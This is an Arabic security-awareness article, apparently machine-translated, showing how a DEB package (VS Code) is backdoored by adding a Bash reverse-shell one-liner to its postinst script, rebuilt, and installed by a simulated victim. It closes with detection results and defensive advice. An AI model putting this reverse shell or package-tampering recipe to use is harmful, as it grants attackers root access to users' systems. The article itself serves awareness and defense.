هل تعلم أنه بإمكان المهاجمين تعديل البرامج النصية الموجودة في ملف DEB للوصول غير المصرح به إلى جهاز الكمبيوتر الخاص بك؟ وإليك كيفية عمل الباب الخلفي لحزم DEB.

الماخذ الرئيسية

  • يمكن اختراق حزم DEB بسهولة، مما يسمح للمهاجمين بإدخال تعليمات برمجية ضارة إلى نظامك عند تثبيتها بأذونات الجذر.
  • من الصعب اكتشاف حزم DEB المصابة، حيث قد لا يتم تمييزها بواسطة برامج مكافحة الفيروسات أو الحلول السحابية مثل VirusTotal.
  • لحماية نفسك، تجنب تنزيل حزم DEB من مواقع عشوائية، والتزم بمواقع التنزيل الرسمية أو المواقع الموثوق بها من قبل المجتمع، وفكر في تثبيت أدوات الأمان لتأمين نظام Linux الخاص بك ضد الشبكة الهجمات.

ملفات DEB هي حزم برامج تمثل التنسيق الأساسي لبرامج الشحن على توزيعات Linux المستندة إلى Debian.

لتثبيت حزم DEB، يجب عليك استخدام مدير الحزم مثل dpkg مع أذونات الجذر. يستغل المهاجمون هذا ويدخلون أبوابًا خلفية في هذه الحزم. عند تثبيتها باستخدام dpkg أو أي مدير حزم آخر، يتم أيضًا تنفيذ التعليمات البرمجية الضارة جنبًا إلى جنب مع نظامك مما يعرضه للخطر.

دعنا نستكشف بالضبط كيفية إغلاق حزم DEB وما يمكنك فعله لحماية نفسك.

instagram viewer

كيف تكون حزم DEB مستترة؟

قبل أن تفهم كيفية فتح الباب الخلفي لحزم DEB، دعنا نستكشف ما بداخل حزمة DEB. للتوضيح، سأقوم بتنزيل حزمة Microsoft Visual Studio Code DEB من موقع Microsoft الرسمي. هذه هي نفس الحزمة التي ستقوم بتنزيلها إذا كنت تريد تثبيت VS Code على Linux.

تحميل:كود الاستوديو المرئي

الآن بعد أن قمت بتنزيل الحزمة المستهدفة، فقد حان الوقت لفكها. يمكنك فك حزمة DEB باستخدام ملف dpkg-deb الأمر مع علامة متبوعة بالمسار لتخزين المحتويات:

dpkg-deb -R

يجب أن يؤدي ذلك إلى استخراج محتويات حزمة VS Code.

بالانتقال إلى المجلد ستجد أدلة متعددة، ومع ذلك، فإن اهتمامنا يكمن فقط في ديبيان الدليل. يحتوي هذا الدليل على نصوص صيانة يتم تنفيذها أثناء التثبيت بامتيازات الجذر. وكما قد تكون عرفت بالفعل، يقوم المهاجمون بتعديل البرامج النصية الموجودة في هذا الدليل.

للتوضيح، سأقوم بتعديل postinst البرنامج النصي وإضافة غلاف TCP عكسي بسيط من Bash. وكما يوحي الاسم، فهو عبارة عن برنامج نصي يتم تنفيذه بعد تثبيت الحزمة على النظام.

ويحتوي على أوامر تنهي التكوينات مثل إعداد الروابط الرمزية ومعالجة التبعيات والمزيد. يمكنك العثور على الكثير من الأصداف العكسية المختلفة على الإنترنت. معظمهم سيعملون بنفس الطريقة. وإليك عينة من بطانة واحدة من الغلاف العكسي:

bash -i >& /dev/tcp/127.0.0.1/42069 0>&1

شرح الأمر:

  • سحق: هذا هو الأمر الذي يستدعي Bash Shell.
  • -أنا: تطلب العلامة من Bash أن يعمل في الوضع التفاعلي مما يسمح بإدخال/إخراج الأوامر في الوقت الفعلي.
  • >& /dev/tcp/ip/port: هذا يعيد التوجيه الإخراج القياسي والخطأ القياسي بمقبس الشبكة، مما يؤدي بشكل أساسي إلى إنشاء اتصال TCP بالشبكة و .
  • 0>&1: يؤدي هذا إلى إعادة توجيه الإدخال والإخراج إلى نفس الموقع، أي إلى مقبس الشبكة.

بالنسبة للمبتدئين، الصدفة العكسية هي نوع من التعليمات البرمجية التي، عند تنفيذها على الجهاز المستهدف، تبدأ الاتصال مرة أخرى بجهاز المهاجم. تعد الأصداف العكسية طريقة رائعة لتجاوز قيود جدار الحماية حيث يتم إنشاء حركة المرور من الجهاز الموجود خلف جدار الحماية.

وإليك كيف يبدو البرنامج النصي المعدل:

كما ترون، كل شيء هو نفسه ولكن تمت إضافة سطر واحد فقط، أي غلاف Bash العكسي الخاص بنا. أنت الآن بحاجة إلى إعادة إنشاء الملفات في ".deb" شكل. ببساطة استخدم com.dpkg الأمر مع --يبني العلم أو الاستخدام dpkg-deb مع ال علامة متبوعة بمسار المحتويات المستخرجة:

dpkg --build 
dpkg-deb -b

أصبحت الآن حزمة DEB ذات الباب الخلفي جاهزة للشحن على المواقع الضارة. دعونا نحاكي سيناريو حيث قام الضحية بتنزيل حزمة DEB على نظامه وقام بتثبيتها مثل أي حزمة عادية أخرى.

الجزء العلوي من المحطة مخصص لوجهة نظر الضحية والجزء السفلي هو وجهة نظر المهاجم. يقوم الضحية بتثبيت الحزمة باستخدام سودو دبكج -i ويستمع المهاجم بصبر للاتصالات الواردة باستخدام netcat الأمر في لينكس.

بمجرد انتهاء التثبيت، لاحظ أن المهاجم حصل على اتصال shell العكسي وأصبح لديه الآن حق الوصول إلى نظام الضحية. الآن أنت تعرف كيف يتم فتح الباب الخلفي لحزم DEB. دعونا نتعلم الآن كيف يمكنك حماية نفسك.

كيفية اكتشاف ما إذا كانت حزمة DEB ضارة أم لا

الآن بعد أن عرفت أن حزم DEB المصابة موجودة، لا بد أنك تتساءل عن كيفية العثور على الحزم المصابة. بالنسبة للمبتدئين، يمكنك محاولة استخدام برامج مكافحة الفيروسات لينكس مثل كلاماف. لسوء الحظ، عندما تم إجراء فحص ClamAV على الحزمة، لم يتم وضع علامة عليها على أنها ضارة. وهنا نتيجة الفحص:

لذا، ما لم يكن لديك حل متميز لمكافحة الفيروسات (وهذا لا يضمن عدم تعرضك للاختراق)، فمن الصعب جدًا اكتشاف حزم DEB الضارة. دعنا نحاول استخدام أحد الحلول السحابية مثل موقع VirusTotal:

كما ترون، لم يكتشف VirusTotal أي خطأ به. حسنًا، الطريقة الوحيدة لحماية نفسك من مثل هذه التهديدات هي اتباع القواعد الأمنية الأساسية مثل عدم تنزيل الملفات من مصادر غير معروفة دائمًا التحقق من تجزئة الملفوبشكل عام، تجنب تثبيت البرامج المشبوهة.

الإنترنت مليء بمثل هذه التهديدات. الطريقة الوحيدة للتصفح دون فقدان بياناتك هي أن تتمتع بذكائك وتتصفح المواقع الموثوقة. بالإضافة إلى ذلك، بالنسبة لنظام التشغيل Linux، يجب عليك أيضًا محاولة معرفة ما إذا كان البرنامج الذي تقوم بتنزيله يحتوي على متغير AppImage نظرًا لأنها مستقلة بذاتها ويمكن وضعها في وضع الحماية، وبالتالي تظل بعيدة عن الاتصال بنظامك.

لا تقم بتنزيل حزم DEB من مواقع عشوائية!

حزم DEB ليست سيئة بطبيعتها، ومع ذلك، يمكن للمهاجمين بسهولة تحويلها إلى أسلحة وشحنها إلى مستخدمين غير مرتابين. كما هو موضح، يمكن فتح حزمة DEB وتعديلها بسهولة لإضافة تعليمات برمجية مخصصة باستخدام عدد قليل من الأوامر فقط، مما يجعلها ناقلًا شائعًا لشحن البرامج الضارة.

حتى الأبواب الخلفية البسيطة في حزم DEB لا يمكن اكتشافها بواسطة أفضل حلول مكافحة الفيروسات. لذا فإن أفضل ما يمكنك فعله هو اللعب بأمان، وتحمل الفطرة السليمة أثناء تصفح الويب، وتنزيل البرامج دائمًا فقط من مواقع التنزيل الرسمية أو المواقع الموثوق بها من قبل المجتمع.

الآن بعد أن أصبحت على دراية بالمخاطر الأمنية التي تصاحب تثبيت حزم DEB من مواقع جديدة أو غير معروفة، يجب عليك توخي الحذر عند تثبيت برامج جديدة. ومع ذلك، فإن مجرد توخي الحذر بشأن ما تقوم بتثبيته لا يكفي. يمكن أن يكون نظام Linux الخاص بك هدفًا لهجمات الشبكة أيضًا.

للتأكد من أنك آمن في حالة حدوث هجوم على الشبكة، يجب أن تفكر في تثبيت أدوات أمان الشبكة.